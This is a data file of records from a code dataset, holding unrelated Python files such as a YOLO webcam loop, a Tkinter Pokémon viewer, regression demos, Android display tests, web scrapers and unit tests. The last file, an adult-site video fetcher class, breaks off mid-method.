= 'discover_runner.DiscoverRunner'\n","repo_name":"ecobasa/cosinnus-note","sub_path":"tests/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"30980178021","text":"import cv2\r\nfrom ultralytics import YOLO\r\n\r\n# 학습된 모델 파일 경로\r\nmodel_path = 'C:/test/train01/weights/best.pt'\r\n\r\n# Load the YOLOv8 model\r\nmodel = YOLO(model_path)\r\n\r\n# Open the video file\r\nvideo_path = 1\r\ncap = cv2.VideoCapture(video_path)\r\n\r\n# Loop through the video frames\r\nwhile cap.isOpened():\r\n # Read a frame from the video\r\n success, frame = cap.read()\r\n\r\n # 좌우 반전\r\n flipped_frame = cv2.flip(frame, 1)\r\n\r\n if success:\r\n # Run Tomato on the frame\r\n results = model(frame)\r\n\r\n # Visualize the results on the frame\r\n annotated_frame = results[0].plot()\r\n\r\n # Display the annotated frame\r\n cv2.imshow(\"Tomato\", annotated_frame)\r\n\r\n # Set the window property to be always on top\r\n cv2.setWindowProperty(\"Tomato\", cv2.WND_PROP_TOPMOST, 1)\r\n\r\n # Break the loop if 'q' is pressed\r\n if cv2.waitKey(100) & 0xFF == ord(\"q\"):\r\n break\r\n else:\r\n # Break the loop if the end of the video is reached\r\n break\r\n\r\n# Release the video capture object and close the display window\r\ncap.release()\r\ncv2.destroyAllWindows()\r\n","repo_name":"leeaemin/github_test","sub_path":"porject/video_test.py","file_name":"video_test.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"11000738233","text":"from urllib import request\nfrom project import Project\nimport tomlkit\n\n\nclass ProjectReader:\n def __init__(self, url):\n self._url = url\n\n def get_project(self):\n # tiedoston 
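The YOLO webcam loop above flips the frame before checking success (cv2.flip raises on None whenever a read fails), and flipped_frame is then never used. A sketch of the intended order, reusing the record's cap and model and assuming the mirrored view is what the model should see:

while cap.isOpened():
    success, frame = cap.read()
    if not success:
        break
    frame = cv2.flip(frame, 1)          # mirror first, then detect on it
    results = model(frame)
    annotated_frame = results[0].plot()
    cv2.imshow("Tomato", annotated_frame)
    if cv2.waitKey(100) & 0xFF == ord("q"):
        break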
merkkijonomuotoinen sisältö\n content = request.urlopen(self._url).read().decode(\"utf-8\")\n\n toml_data = tomlkit.parse(content)\n\n poetry_data = toml_data.get(\"tool\").get(\"poetry\")\n\n name = poetry_data.get(\"name\")\n description = poetry_data.get(\"description\")\n license = poetry_data.get(\"license\")\n authors = poetry_data.get(\"authors\")\n\n\n dependencies = []\n dev_dependencies = []\n\n poetry_dependencies = poetry_data.get(\"dependencies\")\n for dep_name, dep_version in poetry_dependencies.items():\n dependencies.append(f\"{dep_name}\")\n\n dev_dependencies_data = poetry_data.get(\"group\").get(\"dev\").get(\"dependencies\")\n for dev_dep_name, dev_dep_version in dev_dependencies_data.items():\n dev_dependencies.append(f\"{dev_dep_name}\")\n\n result = f\"Name: {name}\\nDescription: {description}\\nLicense: {license}\\n\\nAuthors:\"\n for author in authors:\n result += f\"\\n- {author}\"\n\n result += \"\\n\\nDependencies:\"\n for dep in dependencies:\n result += f\"\\n- {dep}\"\n\n result += \"\\n\\nDevelopment dependencies:\"\n for dev_dep in dev_dependencies:\n result += f\"\\n- {dev_dep}\"\n\n return result\n\n\n # deserialisoi TOML-formaatissa oleva merkkijono ja muodosta Project-olio sen tietojen perusteella\n return Project(name, description, dependencies, dev_dependencies)\n","repo_name":"hakkajoe/palautusrepositorio","sub_path":"viikko2/project-reader/src/project_reader.py","file_name":"project_reader.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"40535918815","text":"from tkinter import *\nfrom tkinter import ttk\nfrom poke_api import get_pokemon_info\nfrom tkinter import messagebox\n\n# Create the window\nroot = Tk()\nroot.title(\"Pokémon Info Viewer\")\n# Additional window configuration\nroot.resizable(False, False)\n# Add frames to window\nfrm_top = ttk.Frame(root)\nfrm_top.grid(row=0, column=0, columnspan=2,pady=(20, 10))\n\nfrm_btm_left = ttk.LabelFrame(root, text='Info')\nfrm_btm_left.grid(row=1, column=0, padx=(20, 10), pady=(10, 20), sticky=N)\n\nfrm_btm_right = ttk.LabelFrame(root, text='Stats')\nfrm_btm_right.grid(row=1, column=1, padx=(10, 20), pady=(10, 20))\n\n# Add widgets to frames\n# Populate widget in the top frame\nlbl_name = ttk.Label(frm_top, text='Pokémon name:')\nlbl_name.grid(row=0, column=0, padx=(10, 5), pady=10)\n\nent_name = ttk.Entry(frm_top)\nent_name.grid(row=0, column=1)\n\ndef handle_get_info():\n # get the Pokémon name entered by the user\n poke_name = ent_name.get().strip()\n if len(poke_name) == 0:\n return\n\n # Get the pokemon info from the API\n poke_info = get_pokemon_info(poke_name)\n if poke_info is None:\n error_msg = f'Unable to fetch information for {poke_name.capitalize()} from the PokeAPI.'\n messagebox.showinfo(title='Error', message=error_msg, icon='error')\n return\n\n # check if pokemon has 2 types\n if len(poke_info['types']) == 2:\n type = poke_info['types'][0]['type']['name']+ \", \" + poke_info['types'][1]['type']['name']\n else:\n type = poke_info['types'][0]['type']['name']\n\n # Populkate the info values\n lbl_height_value['text'] = f\"{poke_info['height']} dm\"\n lbl_weight_value['text'] = f\"{poke_info['weight']} hg\"\n lbl_type_value['text'] = f\"{type}\"\n\n # Populate the stats values\n bar_hp['value'] = poke_info['stats'][0]['base_stat']\n bar_attack['value'] = poke_info['stats'][1]['base_stat']\n bar_defense['value'] = poke_info['stats'][2]['base_stat']\n bar_S_attack['value'] = 
poke_info['stats'][3]['base_stat']\n bar_S_defense['value'] = poke_info['stats'][4]['base_stat']\n bar_speed['value'] = poke_info['stats'][5]['base_stat']\n return\n\nbtn_get_info = ttk.Button(frm_top, text='Get Info', command=handle_get_info)\nbtn_get_info.grid(row=0, column=2, padx=10, pady=10)\n\n# Populate widget in the Info frame\n# Height:\nlbl_height = ttk.Label(frm_btm_left, text='Height:')\nlbl_height.grid(row=0, column=0, sticky=E)\nlbl_height_value = ttk.Label(frm_btm_left, text='TBD')\nlbl_height_value.grid(row=0, column=1)\n# Weight:\nlbl_weight = ttk.Label(frm_btm_left, text='Weight:')\nlbl_weight.grid(row=1, column=0, sticky=E)\nlbl_weight_value = ttk.Label(frm_btm_left, text='TBD')\nlbl_weight_value.grid(row=1, column=1)\n# Type:\nlbl_type = ttk.Label(frm_btm_left, text='Type:')\nlbl_type.grid(row=2, column=0, sticky=E)\nlbl_type_value = ttk.Label(frm_btm_left, text='TBD')\nlbl_type_value.grid(row=2, column=1)\n\n\n# Populate widget in the stats frame\n# Hp:\nlbl_hp = ttk.Label(frm_btm_right, text='HP:')\nlbl_hp.grid(row=0, column=0, sticky=E)\nbar_hp = ttk.Progressbar(frm_btm_right, orient=HORIZONTAL, length=200, maximum=255)\nbar_hp.grid(row=0, column=1)\n# Attack:\nlbl_attack = ttk.Label(frm_btm_right, text='Attack:')\nlbl_attack.grid(row=1, column=0, sticky=E)\nbar_attack = ttk.Progressbar(frm_btm_right, orient=HORIZONTAL, length=200, maximum=255)\nbar_attack.grid(row=1, column=1)\n# Defence:\nlbl_defense = ttk.Label(frm_btm_right, text='Deffence:')\nlbl_defense.grid(row=2, column=0, sticky=E)\nbar_defense = ttk.Progressbar(frm_btm_right, orient=HORIZONTAL, length=200, maximum=255)\nbar_defense.grid(row=2, column=1)\n# Special Attack:\nlbl_S_attack = ttk.Label(frm_btm_right, text='Special Attack:')\nlbl_S_attack.grid(row=3, column=0, sticky=E)\nbar_S_attack = ttk.Progressbar(frm_btm_right, orient=HORIZONTAL, length=200, maximum=255)\nbar_S_attack.grid(row=3, column=1)\n# Special Defence:\nlbl_S_defense = ttk.Label(frm_btm_right, text='Special Defence:')\nlbl_S_defense.grid(row=3, column=0, sticky=E)\nbar_S_defense = ttk.Progressbar(frm_btm_right, orient=HORIZONTAL, length=200, maximum=255)\nbar_S_defense.grid(row=3, column=1)\n# Speed:\nlbl_speed = ttk.Label(frm_btm_right, text='Speed:')\nlbl_speed.grid(row=4, column=0, sticky=E)\nbar_speed = ttk.Progressbar(frm_btm_right, orient=HORIZONTAL, length=200, maximum=255)\nbar_speed.grid(row=4, column=1)\n\n\n\n\n# Loop until window is closed\n\nroot.mainloop()","repo_name":"Agent00Muffin/Lab-9-Poke-Viewer","sub_path":"poke_Info_viewer.py","file_name":"poke_Info_viewer.py","file_ext":"py","file_size_in_byte":4359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"25668643811","text":"\"\"\"\n172. Factorial Trailing Zeroes\nEasy\n\nGiven an integer n, return the number of trailing zeroes in n!.\nExample 1:\n\nInput: 3\nOutput: 0\nExplanation: 3! = 6, no trailing zero.\nExample 2:\n\nInput: 5\nOutput: 1\nExplanation: 5! 
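In the Stats frame of the Pokémon viewer above, the Special Defence label and bar are gridded at row=3, the same cells as Special Attack, so one pair hides the other when handle_get_info fills both ('Deffence' is also a typo for 'Defence'). The corrected placements, as a patch against the record's widgets:

lbl_S_defense = ttk.Label(frm_btm_right, text='Special Defence:')
lbl_S_defense.grid(row=4, column=0, sticky=E)   # was row=3, colliding with Special Attack
bar_S_defense = ttk.Progressbar(frm_btm_right, orient=HORIZONTAL, length=200, maximum=255)
bar_S_defense.grid(row=4, column=1)
lbl_speed.grid(row=5, column=0, sticky=E)       # shift Speed down one row
bar_speed.grid(row=5, column=1)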
= 120, one trailing zero.\n\"\"\"\n\n\"\"\"\nTime- log n\n\"\"\"\n\nclass Solution(object):\n def trailingZeroes(self, n):\n \"\"\"\n :type n: int\n :rtype: int\n \"\"\"\n i=5\n x=n\n res= 0\n while x/i>0:\n res+= x/i\n i*=5\n return res\n","repo_name":"adykumar/DangerWager","sub_path":"Swad/025-172-LC-easy-FactorialTrailingZeroes.py","file_name":"025-172-LC-easy-FactorialTrailingZeroes.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"21865841919","text":"import unittest\nimport robust_regression.utils.integration_utils as iu\nimport numpy as np\n\n\nclass TestIntegrationUtils(unittest.TestCase):\n def test1(self):\n self.assertAlmostEqual(0.0, 0.0)\n\n # def test_output(self):\n # # Test that the output of the function is correct\n # def f(x):\n # return x**2\n\n # mean = 1.0\n # std = 2.0\n # expected_output = np.exp(mean**2) * np.sum(iu.w_ge * f(np.sqrt(2) * std * iu.x_ge + mean))\n\n # # Note: we cannot use @njit-ed function in assertAlmostEqual,\n # # thus, we test np.isclose for the expected output and the function output\n # self.assertTrue(np.isclose(iu.gauss_hermite_quadrature(f, mean, std), expected_output))\n\n # def test_error_raised(self):\n # # Test that an error is raised if the input function does not return a scalar\n # def f(x):\n # return np.array([x**2, x**3])\n\n # mean = 1.0\n # std = 2.0\n # with self.assertRaises(ValueError):\n # iu.gauss_hermite_quadrature(f, mean, std)\n\n # def test_valid_input(self):\n # # Test that the function executes without errors for valid input values\n # def f(x):\n # return np.exp(-x**2)\n\n # mean = 0.0\n # std = 1.0\n # iu.gauss_hermite_quadrature(f, mean, std) # Should not raise an error\n\n\nclass TestDivideIntegrationBordersMultipleGrid(unittest.TestCase):\n def test_N_equals_0(self):\n square_borders = [(-1, 1), (-1, 1)]\n N = 0\n with self.assertRaises(ValueError):\n iu.divide_integration_borders_multiple_grid(square_borders, N)\n\n def test_N_equals_1(self):\n square_borders = [(-1, 1), (-1, 1)]\n N = 1\n domain_x, domain_y = iu.divide_integration_borders_multiple_grid(square_borders, N)\n expected_domain_x = [[-1.0, 1.0]]\n expected_domain_y = [[-1.0, 1.0]]\n self.assertEqual(domain_x, expected_domain_x)\n self.assertEqual(domain_y, expected_domain_y)\n\n def test_N_greater_than_1(self):\n square_borders = [(-1, 1), (-1, 1)]\n N = 4\n domain_x, domain_y = iu.divide_integration_borders_multiple_grid(square_borders, N)\n expected_domain_x = [\n [-1.0, -0.5],\n [-1.0, -0.5],\n [-1.0, -0.5],\n [-1.0, -0.5],\n [-0.5, 0.0],\n [-0.5, 0.0],\n [-0.5, 0.0],\n [-0.5, 0.0],\n [0.0, 0.5],\n [0.0, 0.5],\n [0.0, 0.5],\n [0.0, 0.5],\n [0.5, 1.0],\n [0.5, 1.0],\n [0.5, 1.0],\n [0.5, 1.0],\n ]\n expected_domain_y = [\n [-1.0, -0.5],\n [-0.5, 0.0],\n [0.0, 0.5],\n [0.5, 1.0],\n [-1.0, -0.5],\n [-0.5, 0.0],\n [0.0, 0.5],\n [0.5, 1.0],\n [-1.0, -0.5],\n [-0.5, 0.0],\n [0.0, 0.5],\n [0.5, 1.0],\n [-1.0, -0.5],\n [-0.5, 0.0],\n [0.0, 0.5],\n [0.5, 1.0],\n ]\n self.assertEqual(len(domain_x), len(expected_domain_x))\n self.assertEqual(len(domain_y), len(expected_domain_y))\n\n self.assertEqual(domain_x, expected_domain_x)\n self.assertEqual(domain_y, expected_domain_y)\n\n def test_N_max_range_zero(self):\n square_borders = [(0, 0), (0, 0)]\n N = 3\n domain_x, domain_y = iu.divide_integration_borders_multiple_grid(square_borders, N)\n expected_domain_x = [\n [0.0, 0.0],\n [0.0, 0.0],\n [0.0, 0.0],\n [0.0, 0.0],\n [0.0, 0.0],\n [0.0, 0.0],\n [0.0, 
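trailingZeroes above is written for Python 2, where `/` is floor division; under Python 3 the loop accumulates float fractions and the `while x/i > 0` test never sees an exact zero. The Legendre-style count of factors of 5, in Python 3:

def trailing_zeroes(n: int) -> int:
    # Count factors of 5 in n!: floor(n/5) + floor(n/25) + floor(n/125) + ...
    res, i = 0, 5
    while i <= n:
        res += n // i
        i *= 5
    return res

assert trailing_zeroes(5) == 1 and trailing_zeroes(100) == 24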
0.0],\n [0.0, 0.0],\n [0.0, 0.0],\n ]\n expected_domain_y = [\n [0.0, 0.0],\n [0.0, 0.0],\n [0.0, 0.0],\n [0.0, 0.0],\n [0.0, 0.0],\n [0.0, 0.0],\n [0.0, 0.0],\n [0.0, 0.0],\n [0.0, 0.0],\n ]\n self.assertEqual(domain_x, expected_domain_x)\n self.assertEqual(domain_y, expected_domain_y)\n\n def test_N_max_range_negative(self):\n square_borders = [(-1, 1), (-1, 1)]\n N = 10\n domain_x, domain_y = iu.divide_integration_borders_multiple_grid(square_borders, N)\n for sublist in domain_x + domain_y:\n self.assertGreaterEqual(sublist[1], sublist[0])\n\n def test_output_dimensions(self):\n square_borders = [(-1, 1), (-1, 1)]\n N = 10\n domain_x, domain_y = iu.divide_integration_borders_multiple_grid(square_borders, N)\n self.assertEqual(len(domain_x), N * N)\n self.assertEqual(len(domain_y), N * N)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"IdePHICS/RobustRegression","sub_path":"tests_robust_regression/test_utils/test_integration_utils.py","file_name":"test_integration_utils.py","file_ext":"py","file_size_in_byte":4747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"27609702172","text":"#Regularization applied on Linear Regression\n\n#Importing Libraries\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\n#Import the Dataset \ndataset = pd.read_csv('Salary_Data.csv')\nX = dataset.iloc[:,:-1].values\ny = dataset.iloc[:,1].values\n\n#Splitting the dataset into test set and training set\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 1/3, random_state = 0)\n \n#Fitting Simple Linear Regression to the Training set\nfrom sklearn.linear_model import LinearRegression\nregressor = LinearRegression()\nregressor.fit(X_train, y_train)\n\n#Using Ridge Regression\nfrom sklearn.linear_model import Ridge\nrr = Ridge(alpha = 100)#large value of alpha is taken to display the difference in the ridge and linear regeression\nrr.fit(X_train, y_train)\n\n#Using Lasso regression\nfrom sklearn.linear_model import Lasso\nlr = Lasso(alpha = 10000)#alpha here is taken larger as the number of parameters are small and no. 
of useless parameters is very low\n#10000 is taken to clearly visualize lasso regression on the plot\nlr.fit(X_train, y_train)\n\n#Visualising the training results \nplt.scatter(X_train, y_train, color = 'red')\nplt.plot(X_train, regressor.predict(X_train), color = 'green')\nplt.plot(X_train, rr.predict(X_train), color = 'blue')\nplt.plot(X_train, lr.predict(X_train), color = 'yellow')\nplt.title(\"Salary vs Experience (Training set)\")\nplt.xlabel(\"Years of experience\")\nplt.ylabel(\"Salary\")\nplt.show()\n\n","repo_name":"Somesh-Pant/ML-NLP-ANN-CNN-templates-spyder-","sub_path":"Machine learning/models/Regularization/Ridge_Regression(LR).py","file_name":"Ridge_Regression(LR).py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"29540406699","text":"import zipfile\r\nimport re\r\nimport os\r\n\r\ncount = 0\r\n\r\n# Extract .docx file, get a list of its files and a sublist of its images,\r\n# then read them and rewrite them in the 'Imágenes recuperadas' folder\r\n# with a proper name (name of the .docx file + number of image + extension)\r\ndef ext_im(docnam, cont):\r\n    try:\r\n        document = zipfile.ZipFile(docnam)\r\n        filelist = document.namelist()\r\n\r\n        imagelist = [filename for filename in filelist if re.search('.*image.*', filename)]\r\n        imagelist.sort()\r\n\r\n        print('\\n List of images in', docnam, ':', '\\n', imagelist, '\\n')\r\n\r\n        if not os.path.isdir('Imágenes recuperadas'): os.mkdir('Imágenes recuperadas')\r\n\r\n        for image in imagelist:\r\n            imgdata = document.read(image)\r\n# This line would just get the name of the .docx file, with no full path\r\n#            image_pre = re.findall('([^\\\\\\]+)\\.', docnam)[0] + '_'\r\n            image_pre = docnam.replace('\\\\', '-')\r\n            image_pre = re.findall('.-(.+)\\.', image_pre)[0] + '_'\r\n            image_ext = re.findall('([0-9]+\\..{2,4}$)', image)[0]\r\n            imagename = image_pre + image_ext\r\n            imagepath = os.path.join('Imágenes recuperadas', imagename)\r\n            if os.path.exists(imagepath): continue\r\n            print('Extracting image:', imagename)\r\n            fhand = open(imagepath, 'wb')\r\n            fhand.write(imgdata)\r\n            fhand.close()\r\n            cont = cont + 1\r\n        document.close()\r\n    except:\r\n        print('\\n No way to extract images from:', docnam)\r\n    return cont\r\n\r\n# Walk the whole tree of folders and extract images from the .docx files found\r\nfor (nombredir, dirs, ficheros) in os.walk('.'):\r\n    for nombrefichero in ficheros:\r\n        if not (nombrefichero.endswith('.doc') or nombrefichero.endswith('.docx')): continue\r\n# The following lines make the loop extract images only from files whose\r\n# name contains some key-words related to controls, exams...\r\n        key_words = ['control', 'examen', 'exámenes', 'evaluación', 'evaluacion',\r\n                     'recuperación', 'recuperacion', 'rec']\r\n        flag = 0\r\n        for key_word in key_words:\r\n            if re.search(key_word, nombrefichero.lower()):\r\n                flag = 1\r\n        if flag == 0: continue\r\n###\r\n        elfichero = os.path.join(nombredir, nombrefichero)\r\n        count = ext_im(elfichero, count)\r\n\r\nprint('\\n', 'Number of images extracted:', count)\r\n","repo_name":"Mjbarber/formulas","sub_path":"imgextract.py","file_name":"imgextract.py","file_ext":"py","file_size_in_byte":2451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"41982431422","text":"#! 
/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom uiautomator import Device\nfrom time import sleep\nfrom nose.tools import assert_equal\nfrom nose.tools import assert_not_equal\nfrom nose.tools import assert_raises\nfrom nose.tools import raises\nimport utility.common as u\nfrom utility.setdisplaytimeout import setDisplayTimeout\nclass Testlcd(object):\n    @classmethod\n    def setup_class(self):\n        \"\"\"This method is run once for each class before any tests are run\"\"\"\n        #Initial value (criterion )\n        self.fixture_serial_no = \"f0e673e1\"\n        self.DUT_serial_no = \"70400121\"\n        self.lux_max_lcd_on = 50\n        self.lux_min_lcd_on = 40\n        self.lux_max_lcd_off = 10\n        self.lux_min_lcd_off = 20\n        #================================\n        # get params from unittest.ini\n        #================================\n        self.fixture_serial_no = u.getparas('lcd','fixture_serial_no')\n        self.DUT_serial_no = u.getparas('lcd','DUT_serial_no')\n        self.lux_max_lcd_on = float(u.getparas('lcd','lux_max_lcd_on'))\n        self.lux_min_lcd_on = float(u.getparas('lcd','lux_min_lcd_on'))\n        self.lux_max_lcd_off = float(u.getparas('lcd','lux_max_lcd_off'))\n        self.lux_min_lcd_off = float(u.getparas('lcd','lux_min_lcd_off'))\n        #================================\n        # Initial Fixture as self.f\n        self.f = Device(self.fixture_serial_no)\n        # Initial DUT as self.d\n        self.d = Device(self.DUT_serial_no)\n        # Install Meter Toolbox apk\n        ret = self.f.server.adb.cmd(\"install -r ./Meter\\ Toolbox_1.1.2_14.apk\").communicate()\n        if not ret:\n            print(\"Failure to install Meter Toolbox apk\")\n        else:\n            print(\"Installed Meter Toolbox apk successfully\")\n        # Install Display Tester apk\n        ret = self.d.server.adb.cmd(\"install -r ./Display\\ Tester_1.2_4.apk\").communicate()\n        if not ret:\n            print(\"Failure to install Display Tester apk\")\n        else:\n            print(\"Successfully installed Display Tester apk\")\n    @classmethod\n    def teardown_class(self):\n        \"\"\"This method is run once for each class _after_ all tests are run\"\"\"\n        #Uninstall Meter toolbox apk\n        #get package name by \"adb shell pm list packages | grep \"meter\"\n        ret = self.f.server.adb.cmd(\"uninstall com.jkfantasy.meterbox\").communicate()\n        if not ret:\n            print(\"Failure to uninstall Meter Toolbox apk\")\n        else:\n            print(\"Successfully uninstalled Meter Toolbox apk\")\n        ret = self.d.server.adb.cmd(\"uninstall com.sain.device.displaytest\").communicate()\n        if not ret:\n            print(\"Failure to uninstall Display Tester apk\")\n        else:\n            print(\"Successfully uninstalled Display Tester apk\")\n\n\n    def setUp(self):\n        \"\"\"This method is run once before _each_ test method is executed\"\"\"\n        u.setup(self.d)\n        u.setup(self.f)\n    def teardown(self):\n        \"\"\"This method is run once after _each_ test method is executed\"\"\"\n        u.teardown(self.d)\n        u.teardown(self.f)\n    def test_lcd_off(self):\n        print(\"Test LCD OFF\")\n        self.d.server.adb.cmd(\"shell am start -n com.sain.device.displaytest/.Main\").communicate()\n        self.d.wait.update()\n        #show Black screen\n        self.d(className=\"android.widget.Button\",resourceId=\"com.sain.device.displaytest:id/lcdblack\").click()\n        self.d.screen.off() \n        # Change to light meter tab in fixture device\n        self.f.server.adb.cmd(\"shell am start -n com.jkfantasy.meterbox/.MainActivity\").communicate()\n        self.f.wait.update()\n        self.f(resourceId=\"com.jkfantasy.meterbox:id/btn_tab1\").click()\n        # Wait 3 seconds to get lux\n        sleep(3)\n        self.f(resourceId=\"com.jkfantasy.meterbox:id/btn_pause\").click()\n        min=self.f(resourceId=\"com.jkfantasy.meterbox:id/tv_light_min_value\").text\n    
max=self.f(resourceId=\"com.jkfantasy.meterbox:id/tv_light_max_value\").text\n avg=self.f(resourceId=\"com.jkfantasy.meterbox:id/tv_light_avg_value\").text\n cur=self.f(resourceId=\"com.jkfantasy.meterbox:id/tv_light_cur_value\").text\n print(\"light_min = %3.2f\" % float(min))\n print(\"light_max = %3.2f\" % float(max))\n print(\"light_avg = %3.2f\" % float(avg))\n print(\"light_cur = %3.2f\" % float(cur))\n self.d.screen.on() \n self.d.press.back()\n assert (float(avg) >= self.lux_min_lcd_off) and (float(avg) <= self.lux_max_lcd_off)\n def test_lcd_on(self):\n print(\"Test LCD ON\")\n # Set Display timeout to maximum (30 minutes) on DUT before testing.\n setDisplayTimeout(self.d,\"30min\")\n\n self.d.server.adb.cmd(\"shell am start -n com.sain.device.displaytest/.Main\").communicate()\n self.d.wait.update()\n #show White screen\n self.d(className=\"android.widget.Button\",resourceId=\"com.sain.device.displaytest:id/lcdwhite\").click()\n self.d.screen.on() \n # Change to light meter tab\n self.f.server.adb.cmd(\"shell am start -n com.jkfantasy.meterbox/.MainActivity\").communicate()\n self.f.wait.update()\n self.f(resourceId=\"com.jkfantasy.meterbox:id/btn_tab1\").click()\n # Wait 3 seconds to get lux\n sleep(3)\n self.f(resourceId=\"com.jkfantasy.meterbox:id/btn_pause\").click()\n min=self.f(resourceId=\"com.jkfantasy.meterbox:id/tv_light_min_value\").text\n max=self.f(resourceId=\"com.jkfantasy.meterbox:id/tv_light_max_value\").text\n avg=self.f(resourceId=\"com.jkfantasy.meterbox:id/tv_light_avg_value\").text\n cur=self.f(resourceId=\"com.jkfantasy.meterbox:id/tv_light_cur_value\").text\n print(\"light_min = %3.2f\" % float(min))\n print(\"light_max = %3.2f\" % float(max))\n print(\"light_avg = %3.2f\" % float(avg))\n print(\"light_cur = %3.2f\" % float(cur))\n self.d.press.back()\n assert (float(avg) >= self.lux_min_lcd_on) and (float(avg) <= self.lux_max_lcd_on)\n \nif __name__ == '__main__':\n lcd=Testlcd()\n lcd.setUp()\n lcd.test_lcd_on()\n lcd.test_lcd_off()\n lcd.teardown()\n","repo_name":"jimlin95/android_automated_test","sub_path":"testcase/lcd/test_lcd.py","file_name":"test_lcd.py","file_ext":"py","file_size_in_byte":6088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"72560233856","text":"import json\nimport requests\nfrom bs4 import BeautifulSoup\n\nagent = {\"User-Agent\":\"Mozilla/5.0\"}\n\ndef usnews_scrape():\n temp_dict = {}\n url_list = [] \n\n index_url = 'https://www.usnews.com/education/online-education/mba/search?mode=list&program=mba'\n response = requests.get(index_url, headers=agent)\n soup = BeautifulSoup(response.text, \"html.parser\")\n\n div_school_list = soup.find_all(\"div\", \n class_=\"padding-top-normal padding-bottom-normal padding-left-normal padding-right-normal\")\n #list of divs that capture each school\n\n for program_block in div_school_list:\n school = program_block.find(\"h3\", class_ = \"heading-large block-tighter\").find(\"a\").text.strip() #name of school\n state = program_block.find(\"div\", class_= \"block-normal text-small\").text[-2:] #state located\n rank = program_block.find(\"div\", class_=\"text-strong\").find(\"div\").text.strip()[1:3].strip() #rank on us news\n \n school_url = program_block.find(\"h3\", class_ = \"heading-large block-tighter\").find(\"a\")[\"href\"]\n url_list.append(school_url)\n response = requests.get(school_url, headers=agent)\n soup = BeautifulSoup(response.text, \"html.parser\")\n is_tuition = 
soup.find(attrs={\"data-test-id\":\"G_PT_IN_STATE_TUITION\"}).text.strip()[1:] #in state tuition per credit, part-time\n os_tuition = soup.find(attrs={\"data-test-id\":\"G_PT_OUT_STATE_TUITION\"}).text.strip()[1:] #out of state tuition per credit, part-time\n is_total = soup.find(attrs={\"data-test-id\":\"STUDENT_FEES_TOTPT_IN_MINUS0_5\"}).text.strip()[1:] #in state tuition total, part-time\n os_total = soup.find(attrs={\"data-test-id\":\"STUDENT_FEES_TOTPT_OUT_MINUS0_5\"}).text.strip()[1:] #out of state tuition total, part-time\n all_online = soup.find(attrs={\"data-test-id\":\"ONLINE_COMPLETENESS\"}).text.strip() #can the program be completed entirely online\n \n temp_dict[school] = {'state':state, 'rank':rank, 'is_tuition':is_tuition, \n 'os_tuition':os_tuition, 'is_total':is_total, \n 'os_total':os_total, 'all_online':all_online\n }\n return temp_dict\n\nusnews_dict = usnews_scrape()\n\nwith open('usnews_data.json', 'w') as f: #creates file in C:\\PogramFiles(x86)\\Notepad++ by default\n json.dump(usnews_dict, f)\n","repo_name":"nickcook530/mbafford","sub_path":"mba_functions.py","file_name":"mba_functions.py","file_ext":"py","file_size_in_byte":2376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"10536589660","text":"# -*- coding: UTF-8 -*-\nfrom ....fetchers.porn_fetcher import PornFetcher\nfrom ....tools.external_fetchers import ExternalFetcher\n\n# Internet tools\nfrom .... import urlparse, urljoin, quote_plus\n\n# Regex\nimport re\n\n# Warnings and exceptions\nimport warnings\n\n# Nodes\nfrom ....catalogs.porn_catalog import PornCatalogCategoryNode, PornCatalogVideoPageNode, VideoSource, VideoNode\nfrom ....catalogs.porn_catalog import PornCategories, PornFilter, PornFilterTypes\n\n\nclass Porn00(PornFetcher):\n @property\n def max_pages(self):\n \"\"\"\n Most viewed videos page url.\n :return:\n \"\"\"\n return 2000\n\n @property\n def object_urls(self):\n return {\n PornCategories.CATEGORY_MAIN: 'http://www.porn00.org/categories/',\n PornCategories.MOST_VIEWED_VIDEO: 'http://www.porn00.org/most-viewed/',\n PornCategories.SEARCH_MAIN: 'http://www.porn00.org/',\n }\n\n @property\n def _default_sort_by(self):\n return {\n PornCategories.MOST_VIEWED_VIDEO: PornFilterTypes.PopularityOrder,\n }\n\n @property\n def base_url(self):\n \"\"\"\n Base site url.\n :return:\n \"\"\"\n return 'http://www.porn00.org/'\n\n def _set_video_filter(self):\n \"\"\"\n Sets the video filters and the default values of the current filters\n :return:\n \"\"\"\n video_filters = {'sort_order': ((PornFilterTypes.PopularityOrder, 'Top', None),\n ),\n 'period_filters': ([(PornFilterTypes.OneDate, 'Today', None),\n (PornFilterTypes.TwoDate, 'This Week', 'week'),\n (PornFilterTypes.ThreeDate, 'This Month', 'month'),\n (PornFilterTypes.AllDate, 'Ever', 'ever'),\n ],\n [('sort_order', [PornFilterTypes.PopularityOrder])]),\n }\n self._video_filters = PornFilter(data_dir=self.fetcher_data_dir,\n video_args=video_filters,\n )\n\n def __init__(self, source_name='Porn00', source_id=0, store_dir='.', data_dir='../Data',\n source_type='Porn', use_web_server=True, session_id=None):\n \"\"\"\n C'tor\n :param source_name: save directory\n \"\"\"\n super(Porn00, self).__init__(source_name, source_id, store_dir, data_dir, source_type, use_web_server,\n session_id)\n self.external_fetchers = ExternalFetcher(session=self.session, user_agent=self.user_agent,\n parser=self.parser)\n\n def _update_available_categories(self, category_data):\n \"\"\"\n Fetches all the 
